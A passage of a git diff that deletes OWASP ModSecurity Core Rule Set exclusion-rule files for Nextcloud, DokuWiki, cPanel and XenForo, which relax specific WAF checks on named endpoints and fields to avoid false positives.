ctl:ruleRemoveById=921150,\ - ctl:ruleRemoveById=930110,\ - ctl:ruleRemoveById=930120" - -# Allow the data type 'text/vcard' - -SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ - "id:9003110,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" - -# Allow the data type 'application/octet-stream' - -SecRule REQUEST_METHOD "@rx ^(?:PUT|MOVE)$" \ - "id:9003115,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@rx /remote\.php/dav/(?:files|uploads)/" \ - "setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |application/octet-stream|'" - -# Allow data types like video/mp4 - -SecRule REQUEST_METHOD "@streq PUT" \ - "id:9003116,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@rx (?:/public\.php/webdav/|/remote\.php/dav/uploads/)" \ - "ctl:ruleRemoveById=920340,\ - ctl:ruleRemoveById=920420" - - -# Allow characters like /../ in files. -# Allow all kind of filetypes. -# Allow source code. - -SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ - "id:9003120,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=930100-930110,\ - ctl:ruleRemoveById=951000-951999,\ - ctl:ruleRemoveById=953100-953130,\ - ctl:ruleRemoveById=920440,\ - ver:'OWASP_CRS/3.3.0'" - -# Allow REPORT requests without Content-Type header (at least the iOS app does this) - -SecRule REQUEST_METHOD "@streq REPORT" \ - "id:9003121,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - chain" - SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ - "t:none,\ - ctl:ruleRemoveById=920340" - - -# [ Searchengine ] -# -# NexCloud uses a search field for filename or content queries. - -SecRule REQUEST_FILENAME "@contains /index.php/core/search" \ - "id:9003125,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:query,\ - ctl:ruleRemoveTargetById=941000-942999;ARGS:query,\ - ctl:ruleRemoveTargetById=932000-932999;ARGS:query,\ - ver:'OWASP_CRS/3.3.0'" - - -# [ DAV ] -# -# NextCloud uses DAV methods with index.php and remote.php to do many things -# The default ones in ModSecurity are: GET HEAD POST OPTIONS -# -# Looking through the code, and via testing, I found these: -# -# File manager: PUT DELETE MOVE PROPFIND PROPPATCH -# Calendars: REPORT -# Others in the code or js files: PATCH MKCOL MOVE TRACE -# Others that I added just in case, and they seem related: -# CHECKOUT COPY LOCK MERGE MKACTIVITY UNLOCK. - -SecRule REQUEST_FILENAME "@rx /(?:remote|index|public)\.php/" \ - "id:9003130,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT PATCH CHECKOUT COPY DELETE LOCK MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH UNLOCK REPORT TRACE jsonp'" - - -# We need to allow DAV methods for sharing files, and removing shares -# DELETE - when the share is removed -# PUT - when setting a password / expiration time - -SecRule REQUEST_FILENAME "@rx /ocs/v[0-9]+\.php/apps/files_sharing/" \ - "id:9003140,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT DELETE'" - - -# [ Preview and Thumbnails ] - -SecRule REQUEST_FILENAME "@contains /index.php/core/preview.png" \ - "id:9003150,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=932150;ARGS:file,\ - ver:'OWASP_CRS/3.3.0'" - -# Filepreview for trashbin - -SecRule REQUEST_FILENAME "@contains /index.php/apps/files_trashbin/ajax/preview.php" \ - "id:9003155,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=932150;ARGS:file,\ - ctl:ruleRemoveTargetById=942190;ARGS:file,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \ - "id:9003160,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=941120;ARGS:requesttoken,\ - ver:'OWASP_CRS/3.3.0'" - - -# [ Ownnote ] - -SecRule REQUEST_FILENAME "@contains /index.php/apps/ownnote/" \ - "id:9003300,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=941150,\ - ver:'OWASP_CRS/3.3.0'" - - -# [ Text Editor ] -# -# This file can save anything, and it's name could be lots of things. - -SecRule REQUEST_FILENAME "@contains /index.php/apps/files_texteditor/" \ - "id:9003310,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filecontents,\ - ctl:ruleRemoveTargetById=921110-921160;ARGS:filecontents,\ - ctl:ruleRemoveTargetById=932150;ARGS:filename,\ - ctl:ruleRemoveTargetById=920370-920390;ARGS:filecontents,\ - ctl:ruleRemoveTargetById=920370-920390;ARGS_COMBINED_SIZE,\ - ver:'OWASP_CRS/3.3.0'" - - -# [ Address Book ] -# -# Allow the data type 'text/vcard' - -SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \ - "id:9003320,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" - -# Allow modifying contacts via the web interface -SecRule REQUEST_METHOD "@streq PUT" \ - "id:9003321,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - chain" - SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \ - "t:none,\ - ctl:ruleRemoveById=200002" - - -# [ Calendar ] -# -# Allow the data type 'text/calendar' - -SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \ - "id:9003330,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/calendar|'" - -# Allow modifying calendar events via the web interface -SecRule REQUEST_METHOD "@streq PUT" \ - "id:9003331,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - chain" - SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \ - "t:none,\ - ctl:ruleRemoveById=200002" - - -# [ Notes ] -# -# We want to allow a lot of things as the user is -# allowed to note on anything. - -SecRule REQUEST_FILENAME "@contains /index.php/apps/notes/" \ - "id:9003340,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveByTag=attack-injection-php,\ - ver:'OWASP_CRS/3.3.0'" - - -# [ Bookmarks ] -# -# Allow urls in data. - -SecRule REQUEST_FILENAME "@contains /index.php/apps/bookmarks/" \ - "id:9003350,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=931130,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Login forms ] -# - -# This removes checks on the 'password' and related fields: - -# User login password. - -SecRule REQUEST_FILENAME "@contains /index.php/login" \ - "id:9003400,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=941100;ARGS:requesttoken,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.3.0'" - -# Reset password. - -SecRule REQUEST_FILENAME "@endsWith /index.php/login" \ - "id:9003410,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq resetpass" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - -# Change Password and Setting up a new user/password - -SecRule REQUEST_FILENAME "@endsWith /index.php/settings/users" \ - "id:9003500,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:newuserpassword,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.3.0'" - - -SecMarker "END-NEXTCLOUD-ADMIN" - -SecMarker "END-NEXTCLOUD" diff --git a/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf b/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf deleted file mode 100644 index 71738c259e..0000000000 --- a/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf +++ /dev/null @@ -1,272 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default Dokuwiki install. -# The exclusions are only active if crs_exclusions_dokuwiki=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. -# -# Note, if you want to relax the upload restrictions, -# see rule 900240. For Dokuwiki you can limit the exception -# to the ajax.php file: -# -# SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" ... -# - - -SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ - "id:9004000,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DOKUWIKI" - -SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ - "id:9004001,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DOKUWIKI" - - -# -# -=[ Dokuwiki Front-End ]=- -# -# Note on files specified: -# /doku.php: shows pages, saves, edits, admin -# /lib/exe/ajax.php: autosave, uploads -# -# Allow pages to be edited, and ajax to save drafts. -# -# ARGS 'wikitext', 'suffix', and 'prefix' must allow the same things, -# as the page (in part or whole) is passed via 'suffix/prefix' at times. -# attack-protocol (921110-921160/920230): Allows odd characters on the page. -# CRS: (still need attack-protocol specified.) -# attack-injection-php (930000-933999): Allows code on page. -# attack-sqli (940000-942999): Allows SQL expressions on page. -# -# Others: -# 930100-930110;REQUEST_BODY: if there's a /../ in the text. -# -# ARGS:summary (the text in the 'summary' box on page edits.): -# Allowing 930120-930130 lets user save summaries with -# system file names. This should not be needed in normal -# use. But leaving a note here of how to allow in rule below: -# ctl:ruleRemoveTargetById=930120;ARGS:summary -# ctl:ruleRemoveTargetById=930130;ARGS:summary -# -# Also, can't specify: -# SecRule ARGS:do "@streq edit" \ -# SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php"\ -# because at times the do=edit can get dropped, so if we use -# above the edit will get blocked when the page is saved. - -# Hint: those using .htaccess rewrites can remove/replace -# this first 'SecRule...' line with 'SecAction \' (unsupported). - -SecRule REQUEST_FILENAME "@rx (?:/doku.php|/lib/exe/ajax.php)$" \ - "id:9004100,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_METHOD "@streq POST" \ - "t:none,\ - chain" - SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:wikitext,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:wikitext,\ - ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:suffix,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:suffix,\ - ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:prefix,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:prefix,\ - ctl:ruleRemoveTargetById=930100-930110;REQUEST_BODY" - - -# Allow it to upload files. But check for cookies just to make sure. - -SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" \ - "id:9004110,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_METHOD "@streq POST" \ - "t:none,\ - chain" - SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ - "t:none,\ - setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type}|application/octet-stream'" - - -# Show the index, even if things like "postgresql" or other things show up. - -SecRule REQUEST_FILENAME "@endsWith /doku.php" \ - "id:9004130,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:do "@streq index" \ - "t:none,\ - chain" - SecRule &ARGS:do "@eq 1" \ - "t:none,\ - ctl:ruleRemoveById=951240,\ - ctl:ruleRemoveById=953110" - - -# -# [ Login form ] -# - -# Turn off checks for password. - -SecRule REQUEST_FILENAME "@endsWith /doku.php" \ - "id:9004200,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:do "@streq login" \ - "t:none,\ - chain" - SecRule &ARGS:do "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:p" - - -# -# [ Admin Area ] -# -# Skip this section for performance unless do=admin is in request - -SecRule ARGS:do "!@streq admin" \ - "id:9004300,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DOKUWIKI-ADMIN" - -SecRule ARGS:do "!@streq admin" \ - "id:9004310,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DOKUWIKI-ADMIN" - - -# [ Reset password ] -# -# Turn off checks for pass1, pass1-text, pass2 - -SecRule REQUEST_FILENAME "@endsWith /doku.php" \ - "id:9004320,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:do "@streq login" \ - "t:none,\ - chain" - SecRule &ARGS:do "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - - -# [ Save config ] -# -# Allow the config to be saved: -# 942200: If the user adds "..." to tagline: ARGS:config[tagline] -# 942430: if ARGS:config[hidepages] has pages looking like sql statements -# 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature] - -SecRule REQUEST_FILENAME "@endsWith /doku.php" \ - "id:9004370,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:page "@streq config" \ - "t:none,\ - chain" - SecRule &ARGS:page "@eq 1" \ - "t:none,\ - chain" - SecRule REQUEST_METHOD "@streq POST" \ - "t:none,\ - chain" - SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ - "t:none,\ - ctl:ruleRemoveTargetById=920230;ARGS:config[dformat],\ - ctl:ruleRemoveTargetById=942200;ARGS:config[tagline],\ - ctl:ruleRemoveTargetById=942430;ARGS:config[hidepages],\ - ctl:ruleRemoveTargetById=942430-942440;ARGS:config[signature]" - - -# When the config loads after a save, it gets blocked because -# it has 'readdir' and lines that look like sql -# 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature] -# 951240,953110: When the page reloads, it triggers -# postgres and php code disclosure rules. - -SecRule REQUEST_FILENAME "@endsWith /doku.php" \ - "id:9004380,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:page "@streq config" \ - "t:none,\ - chain" - SecRule &ARGS:page "@eq 1" \ - "t:none,\ - chain" - SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ - "t:none,\ - ctl:ruleRemoveById=951240,\ - ctl:ruleRemoveById=953110" - - -# End [ Admin Area ] - -SecMarker "END-DOKUWIKI-ADMIN" - -SecMarker "END-DOKUWIKI" diff --git a/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf b/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf deleted file mode 100644 index a92d8093cb..0000000000 --- a/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +++ /dev/null @@ -1,63 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default cPanel environment. -# The exclusions are only active if crs_exclusions_cpanel=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. - - -SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ - "id:9005000,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-CPANEL" - -SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ - "id:9005001,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-CPANEL" - - -# -# [ cPanel whm-server-status ] -# -# Cpanel's WHM auto generates requests to /whm-server-status from -# 127.0.0.1 (triggers rule 920280, non-blocking, log only) Once every 5 minutes. -# These false positives have a low impact (logged, non-blocking) to a large number of users (all cPanel admins). -# - -# -# Rule to allow cPanel whm-server-status requests from localhost without log entry. -# -SecRule REQUEST_LINE "@rx ^GET /whm-server-status(?:/|/\?auto)? HTTP/[12]\.[01]$" \ - "id:9005100,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-apache',\ - tag:'attack-generic',\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ - "t:none,\ - ctl:ruleRemoveById=920280,\ - ctl:ruleRemoveById=920350" - - -SecMarker "END-CPANEL" diff --git a/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf b/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf deleted file mode 100644 index 7474d53ad3..0000000000 --- a/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf +++ /dev/null @@ -1,586 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default XenForo install. -# The exclusions are only active if crs_exclusions_xenforo=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. - -SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ - "id:9006000,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-XENFORO" - -SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ - "id:9006001,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-XENFORO" - - -# -# -=[ XenForo Front-End ]=- -# - -# Proxy for images and remote content embedded in forum posts -# GET /xf/proxy.php?image=https://example.com/some.jpg&hash=foo -# GET /xf/proxy.php?link=https://example.com&hash=foo -# POST /xf/proxy.php, body: referrer=... -SecRule REQUEST_FILENAME "@endsWith /proxy.php" \ - "id:9006100,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:image,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:link,\ - ctl:ruleRemoveTargetById=931130;ARGS:referrer,\ - ctl:ruleRemoveTargetById=942230;ARGS:referrer,\ - ver:'OWASP_CRS/3.3.0'" - -# Store drafts for private message, forum post, thread reply -# POST /xf/conversations/draft -# POST /xf/conversations/convo-title.12345/draft -# POST /xf/forums/forum-title.12345/draft -# POST /xf/threads/thread-title-%E2%98%85.12345/draft -# -# attachment_hash_combined example: -# {"type":"post","context":{"post_id":12345},"hash":"0123456789abcdef..."} -SecRule REQUEST_FILENAME "@rx /(?:conversations|(?:conversations|forums|threads)/.*)/draft$" \ - "id:9006110,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=931130;ARGS:href,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ - ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ - ver:'OWASP_CRS/3.3.0'" - -# Send PM, edit post, create thread, reply to thread -# POST /xf/conversations/add -# POST /xf/conversations/add-preview -# POST /xf/conversations/messages/1463947/edit -# POST /xf/posts/12345/edit -# POST /xf/posts/12345/preview -# POST /xf/conversations/convo-title.12345/add-reply -# POST /xf/threads/thread-title.12345/add-reply -# POST /xf/threads/thread-title.12345/reply-preview -# POST /xf/forums/forum-title.12345/post-thread -# POST /xf/forums/blogs/post-thread -# POST /xf/forums/forum-title.12345/thread-preview -SecRule REQUEST_FILENAME "@rx /(?:conversations/add(?:-preview)?|conversations/messages/\d+/edit|posts/\d+/(?:edit|preview)|(?:conversations|threads)/.*\.\d+/(?:add-reply|reply-preview)|forums/.*/(?:post-thread|thread-preview))$" \ - "id:9006120,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ - ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ - ver:'OWASP_CRS/3.3.0'" - -# Quote -# POST /xf/posts/12345/quote -SecRule REQUEST_FILENAME "@rx /posts/\d+/quote$" \ - "id:9006130,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quoteHtml,\ - ver:'OWASP_CRS/3.3.0'" - -# Multi quote -# POST /xf/conversations/convo-title.12345/multi-quote -# POST /xf/threads/thread-title.12345/multi-quote -# quotes={"12345":["quote-html"]} -SecRule REQUEST_FILENAME "@rx /(?:conversations|threads)/.*\.\d+/multi-quote$" \ - "id:9006140,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quotes,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[0][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[1][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[2][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[3][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[4][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[5][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[6][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[7][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[8][value],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[9][value],\ - ver:'OWASP_CRS/3.3.0'" - -# Delete thread -# POST /xf/threads/thread-title.12345/delete -SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/delete$" \ - "id:9006150,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=942130;ARGS:starter_alert_reason,\ - ver:'OWASP_CRS/3.3.0'" - -# Feature thread -# POST /xf/threads/thread-title.12345/feature-edit -SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/feature-edit$" \ - "id:9006155,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feature[feature_excerpt]" - -# Inline moderate thread -# POST /xf/inline-mod/ -SecRule REQUEST_FILENAME "@endsWith /inline-mod/" \ - "id:9006160,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:author_alert_reason,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ - ver:'OWASP_CRS/3.3.0'" - -# Warn member -# POST /xf/members/name.12345/warn -# POST /xf/posts/12345/warn -SecRule REQUEST_FILENAME "@rx /(?:members/.*\.\d+|posts/\d+)/warn$" \ - "id:9006170,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:conversation_message,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:notes,\ - ver:'OWASP_CRS/3.3.0'" - -# Editor -SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \ - "id:9006200,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:bb_code,\ - ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ - ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ - ver:'OWASP_CRS/3.3.0'" - -# Editor -SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \ - "id:9006210,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html,\ - ver:'OWASP_CRS/3.3.0'" - -# Post attachment -# POST /xf/account/avatar -# POST /xf/attachments/upload?type=post&context[thread_id]=12345&hash=foo -SecRule REQUEST_FILENAME "@rx /(?:account/avatar|attachments/upload)$" \ - "id:9006220,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=200003,\ - ctl:ruleRemoveTargetById=942220;ARGS:flowChunkSize,\ - ctl:ruleRemoveTargetById=942440;ARGS:flowIdentifier,\ - ctl:ruleRemoveTargetById=942440;ARGS:flowFilename,\ - ctl:ruleRemoveTargetById=942440;ARGS:flowRelativePath,\ - ver:'OWASP_CRS/3.3.0'" - -# Media -# POST /xf/index.php?editor/media -SecRule REQUEST_URI "@endsWith /index.php?editor/media" \ - "id:9006230,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ctl:ruleRemoveTargetById=942130;ARGS:url,\ - ver:'OWASP_CRS/3.3.0'" - -# Emoji -# GET /xf/index.php?misc/find-emoji&q=(%0A%0A -SecRule REQUEST_URI "@rx /index\.php\?misc/find-emoji&q=" \ - "id:9006240,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=921151;ARGS:q,\ - ver:'OWASP_CRS/3.3.0'" - -# Login -# POST /xf/login/login -SecRule REQUEST_FILENAME "@endsWith /login/login" \ - "id:9006300,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.3.0'" - -# Register account -# POST /xf/register/register -# The password is passed in a variable-name form parameter. We don't -# want to exclude all parameters completely as this would cause an -# unacceptable bypass. So, we exclude only commonly hit rules. -SecRule REQUEST_FILENAME "@endsWith /register/register" \ - "id:9006310,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=942130;ARGS,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:reg_key,\ - ver:'OWASP_CRS/3.3.0'" - -# Confirm account -# GET /xf/account-confirmation/name.12345/email?c=foo -SecRule REQUEST_FILENAME "@rx /account-confirmation/.*\.\d+/email$" \ - "id:9006315,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c" - -# Edit account -# POST /xf/account/account-details -SecRule 